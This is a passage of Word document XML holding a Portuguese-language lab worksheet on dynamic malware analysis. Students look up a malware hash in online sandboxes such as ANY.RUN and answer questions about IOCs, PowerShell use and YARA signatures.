        <w:t>. Aqui você pode ver os IOCs, como os endereços IP, sites e domínios que o malware tentou entrar em contato. Você também verá hashes para os arquivos criados ou baixados nesses domínios. Além disso, você pode ver os arquivos e processos relacionados à execução do malware no computador host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5109250C" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Pergunta:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DF2D86" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Qual é o primeiro domínio ao qual o malware faz uma solicitação HTTP?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B22AE55" w14:textId="2726725B" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C" w:rsidP="00CA6456">
      <w:pPr>
        <w:pStyle w:val="AnswerLineL50"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Digite suas respostas aqui.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C86E404" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>d.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">Alterne para a guia </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Comportamento</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">. Analise as informações disponíveis aqui. Abaixo da barra de menu, há a lista suspensa que permite selecionar informações de diferentes sandboxes de malware. Solte a lista e selecione </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>VMRay</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>, se ainda não estiver selecionado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE67872" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>O malware usa comandos de shell para abrir programas e processos. Localize as informações sobre os comandos do shell que são executados durante a exploração. Esse malware abre o MS Windows PowerShell e passa um valor para ele.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA78527" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Pergunta:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAC1DE8" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>O que é incomum nesse valor?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065DA1F0" w14:textId="08FDDF7C" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C" w:rsidP="00CA6456">
      <w:pPr>
        <w:pStyle w:val="AnswerLineL50"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Digite suas respostas aqui.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511A2737" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>e.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">Clique na guia </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Community (Comunidade)</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>. Veja os dois envios de. Essas são as assinaturas da YARA processadas pelo scanner THOR APT, uma ferramenta de avaliação de comprometimento da Nextron Systems. Revise as assinaturas. Você não precisa entender tudo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735F3734" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Perguntas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D5B802" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>O que são assinaturas YARA?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F21EA24" w14:textId="0E734408" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C" w:rsidP="00CA6456">
      <w:pPr>
        <w:pStyle w:val="AnswerLineL50"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Digite suas respostas aqui.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03205DFE" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Nos campos de descrição nas assinaturas YARA, o que você pode aprender sobre como o malware usa o PowerShell?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432561D6" w14:textId="7705B248" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C" w:rsidP="00CA6456">
      <w:pPr>
        <w:pStyle w:val="AnswerLineL50"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Digite suas respostas aqui.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2727C0" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">Parte 2: Executar análise dinâmica de malware </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552CB336" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="BodyTextL25"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Agora vamos usar outra ferramenta para analisar os resultados de uma análise dinâmica em um arquivo de malware enviado pela comunidade. ANY.RUN é uma empresa que oferece um sandbox online dinâmico e interativo exclusivo. ANY.RUN oferece um serviço gratuito no qual os usuários da comunidade podem carregar arquivos suspeitos de malware para análise. Ele oferece um conjunto muito rico de análises que oferecem uma visão do comportamento do malware. Os assinantes da versão completa do ANY.RUN podem executar o malware em uma máquina virtual e interagir com o malware se ações do usuário forem necessárias para acioná-lo. Os usuários gratuitos só podem executar amostras de malware em uma máquina virtual Windows 7 de 32 bits, no entanto, os assinantes pagantes podem escolher o sistema operacional que se adapta ao ambiente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE3FCE1" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="BodyTextL25"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>O sandbox ANY.RUN pode executar dinamicamente o malware e exibir detalhes do que o malware faz em uma interface de análise segura. Os usuários pagantes também podem interagir com a sandbox VM na qual o malware é executado. Eles podem responder às solicitações do malware e inspecionar o sistema operacional infectado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B690A8B" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="BodyTextL25"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">Como o vírus, você pode procurar IOCs para ver os resultados das análises dinâmicas ou interativas concluídas anteriormente. Nesta parte do laboratório, enviaremos o mesmo hash de arquivo para ANY.RUN e analisaremos os resultados. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C6694A" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Etapa 1: Acessar ANY.RUN e enviar o IOC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C1F9D9" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="BodyTextL25"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>a.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">Em um navegador da Web, navegue até </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>ANY.RUN</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">. Clique em </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Serviço</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve"> no menu horizontal para ir para a interface de serviço do sandbox.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699ADBFC" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="BodyTextL25"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>b.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>ANY.RUN fornece um painel em tempo real do cenário atual de ameaças de malware com estatísticas relacionadas à distribuição de ameaças de malware e à proporção de envios recentes que foram considerados mal-intencionados, suspeitos ou sem ameaças. Clique em um dos países no mapa para mostrar a lista de envios públicos desse país. Os usuários da comunidade podem visualizar uma análise detalhada para cada envio. Explore e familiarize-se com este painel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F650CC" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Etapa 2: Enviar o IOC e analisar os resultados</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2886A4C9" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
        <w:ind w:hanging="360"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>a.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">Para pesquisar valores de hash, clique em </w:t>
      </w:r>
      <w:r w:rsidRPr="002F0424">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Tarefas públicas</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve"> no menu à esquerda.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506C8477" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
        <w:ind w:hanging="360"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>b.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">Aqui, você pode ver a lista de tarefas públicas que podem ser acessadas. Eles são organizados de acordo com o envio mais recente. As tarefas são rotuladas com o veredicto de análise. Alguns são confirmados como malware e outros são arquivos benignos e outros são suspeitos. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E22B413" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
        <w:ind w:hanging="360"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>c.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Cole o hash da Parte 1 na caixa de pesquisa no canto superior direito da janela e pressione Enter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44633DDB" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
        <w:ind w:hanging="360"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>d.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">Você verá uma página de exploits de malware que têm um artefato que corresponde ao valor de hash. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E48C543" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Pergunta:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C478DA" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Role a lista de envios públicos. Qual é o nome do arquivo que corresponde ao hash? Há apenas um?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6163C8A2" w14:textId="30956A05" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C" w:rsidP="00CA6456">
      <w:pPr>
        <w:pStyle w:val="AnswerLineL50"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Digite suas respostas aqui.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C14CF6F" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
        <w:ind w:hanging="360"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>e.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">Localize a entrada com data de </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>1 de junho de 2019</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve"> para o arquivo </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Data-5544-J5823545.doc</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>. Clique na entrada.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5566B455" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Observação</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">: ANY.RUN executa o malware na sandbox. Às vezes, o malware não executa completamente, então alguns envios não incluem detalhes de toda a exploração. Por exemplo, se o acesso a um servidor de comando e controle (CnC ou </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>2) for necessário na Internet, é possível que o servidor não esteja disponível. Se for esse o caso, a exploração pode interromper a execução antes de atingir seu objetivo. Por esse motivo, é importante analisar várias entradas nos resultados da pesquisa para encontrar uma que parece ter sido totalmente executada.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60210701" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Etapa 3: Explore a interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E16A14E" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="BodyTextL25"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>A interface de análise ANY.RUN fornece informações sobre muitos aspectos do comportamento do malware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75371569" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>a.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
